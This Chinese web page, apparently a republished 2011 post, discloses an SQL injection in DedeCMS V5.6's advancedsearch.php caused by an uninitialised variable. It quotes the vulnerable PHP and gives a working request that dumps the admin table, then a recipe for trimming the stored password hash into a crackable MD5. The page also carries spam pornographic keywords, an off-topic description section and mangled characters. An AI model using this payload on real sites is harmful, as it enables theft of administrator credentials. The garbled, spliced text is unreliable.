欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

DedeCms V5.6漏洞 變量未初始化 導(dǎo)致雞助漏洞

  發(fā)布時間:2011-08-19 10:22:34   作者:佚名   我要評論
DedeCMS內(nèi)容管理系統(tǒng)軟件采用XML名字空間風(fēng)格核心模板:模板全部使用文件形式保存,對用戶設(shè)計模板、網(wǎng)站升級轉(zhuǎn)移均提供很大的便利
漏洞描述:
健壯的模板標簽為站長DIY 自己的網(wǎng)站提供了強有力的支持。高效率標簽緩存機制:允許對類同的標簽進行緩存,在生成 HTML的時候,有利于提高系統(tǒng)反應(yīng)速度,降低系統(tǒng)消耗的資源。模型與模塊概念并存:在模型不能滿足用戶所有需求的情況下,DedeCMS推出一些互動的模塊對系統(tǒng)進行補充,盡量滿足用戶的需求。

plus/advancedsearch.php
$sql 變量未初始化。導(dǎo)致雞助漏洞

復(fù)制代碼
代碼如下:

if($mid == 0) //必須繞過。
{
showmsg('參數(shù)不正確,高級自定義搜索必須指定模型id', 'javascript');
exit();
}
$query = "select maintable, mainfields, addontable, addonfields, template from dede_advancedsearch where mid='$mid'";
$searchinfo = $dsql->GetOne($query);
if(!is_array($searchinfo)) //囧啊,繞過有難度。
{
showmsg('自定義搜索模型不存在','-1'); exit();
}
$template = $searchinfo['template'] != '' ? $searchinfo['template'] : 'advancedsearch.htm';
if(empty($sql)) //人品問題,成功繞過!{
..............
}else{
$sql = urldecode($sql);
$query = $sql;
}
$sql = urlencode($sql);
$dlist = new DataListCP();
$dlist->pageSize = 20;
$dlist->SetParameter("sql", $sql);
$dlist->SetParameter("mid", $mid);
...............
$dlist->SetTemplate($templatefile);
$dlist->SetSource($query);
.............<*參考
*>

測試方法:

本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險自負!
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

密碼是32位MD5減去頭5位,減去尾七位,得到20 MD5密碼,方法是,前減3后減1,得到16位MD5

相關(guān)文章

最新評論